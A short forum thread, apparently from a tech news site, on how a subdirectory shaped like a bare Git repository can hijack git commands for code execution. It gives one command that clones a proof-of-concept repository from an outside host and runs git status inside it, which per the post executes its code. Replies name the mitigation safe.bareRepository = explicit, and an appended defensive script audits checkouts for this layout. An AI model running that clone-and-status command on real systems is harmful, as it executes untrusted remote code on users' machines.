by tomlx 1085 days ago
git does not clone hooks, but if a subdirectory of a repo has the structure of a bare repo it can hijack git subcommands for code execution. try:

  git clone https://git.0x90.space/vmann/pwnd && cd pwnd/whoot && git status

it is a bit crazy this is not disabled by default yet.
2 comments

That's terrifying. I'll think twice before cloning any repository from now on.

> not disabled by default yet

You're saying there's a way to "disable" this behavior?

Set safe.bareRepository = explicit.
none that i know of
That's fascinating! Time to update my blog post on git hooks and go down this rabbit hole!
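
A defender-side check for the layout discussed in this thread, as an added example that is not part of the original posts: it lists directories inside a checkout that look like a bare repository, so they can be reviewed before any git command is run inside them. The function names are hypothetical, and the heuristic (a `HEAD` file next to `objects/` and `refs/` directories) is an assumption about what "the structure of a bare repo" means here.

```shell
#!/bin/sh
# Added example (not from the thread): audit a checkout for embedded
# directories that look like bare repositories.

# Print every directory under $1 that looks like a bare repo.
# Heuristic (assumption): it holds a HEAD file plus objects/ and refs/
# directories. Directories named .git are skipped: those are the ordinary
# metadata of the checkout itself.
find_embedded_bare_repos() {
    root=${1:-.}
    find "$root" -name .git -prune -o -type d -print |
    while IFS= read -r dir; do
        if [ -f "$dir/HEAD" ] && [ -d "$dir/objects" ] && [ -d "$dir/refs" ]; then
            printf '%s\n' "$dir"
        fi
    done
}

# Print the current safe.bareRepository setting.
# When the option is unset, Git behaves as if it were "all".
show_bare_repo_policy() {
    git config --get safe.bareRepository || echo "all (unset)"
}

# Apply the mitigation named in the thread for the current user.
# With "explicit", a bare repository is only used when it is named through
# --git-dir or GIT_DIR, not when it is merely discovered from the
# current directory.
harden_bare_repo_policy() {
    git config --global safe.bareRepository explicit
}

# Typical use after cloning something untrusted, before cd-ing around in it:
#   find_embedded_bare_repos ./some-clone
#   show_bare_repo_policy
```

An empty result from `find_embedded_bare_repos` only means nothing matched this heuristic; setting `safe.bareRepository` is the control that does not depend on spotting the directory first.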